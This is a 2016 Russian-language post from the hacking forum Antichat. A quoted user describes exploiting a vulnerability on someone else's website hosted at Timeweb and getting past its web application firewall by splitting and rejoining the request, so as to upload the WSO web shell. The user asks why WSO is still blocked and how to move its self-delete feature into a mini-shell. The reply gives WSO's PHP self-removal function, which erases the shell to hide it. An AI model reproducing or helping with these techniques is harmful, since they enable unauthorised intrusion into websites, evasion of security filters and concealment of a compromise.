11.01.2016, 21:58
|
|
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
С нами:
7396886
Репутация:
231
|
|
Сообщение от user6334
↑
Спасибо за такой подробный ответ. И раз уж речь зашла про WSO спрошу еще. Есть некий сайт на таймвебе, есть уязвимость, при залитии столкнулся с чем-то вроде WAF, который ругался на текст мини-шелла в запросе. Запрос я разделил, а потом склеил, таким образом обошел защиту, залил WSO. Но WSO не дает просматривать файлы и заливать другие файлы, при попытке срабатывает WAF и происходит переадресация на страницу таймвеб. Все другие шеллы работают замечательно. Что с WSO не так? И еще: только в WSO есть самоудаление, насколько сложен код самоудаления, чтобы например втолкнуть его в мини-шелл?
Код:
function actionSelfRemove() {
if($_POST['p1'] == 'yes')
if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
die('Shell removed');
else
echo 'unlink error!';
if($_POST['p1'] != 'yes')
wsoHeader();
echo 'Suicideremove the shell?
Yes';
wsoFooter();
}
|
|
|